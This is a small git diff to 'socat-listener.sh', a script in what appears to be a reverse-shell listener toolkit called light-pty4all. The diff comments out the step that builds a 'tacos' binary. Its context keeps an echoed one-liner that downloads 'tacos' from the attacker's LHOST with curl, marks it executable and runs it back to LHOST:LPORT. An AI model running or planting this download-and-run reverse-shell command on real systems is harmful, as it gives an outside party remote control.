diff --git a/light-pty4all/socat-listener.sh b/light-pty4all/socat-listener.sh index 24f6f04..6c3a622 100755 --- a/light-pty4all/socat-listener.sh +++ b/light-pty4all/socat-listener.sh @@ -54,8 +54,8 @@ else fi # put tacos in current directory -cd .. && make build.tacos && cd - -mv ../tacos . +# cd .. && make build.tacos && cd - +# mv ../tacos . if [[ "$GITAR" ]]; then echo "curl -O ${LHOST}:9237/pull/tacos -o tacos && chmod +x tacos && ./tacos ${LHOST}:${LPORT}"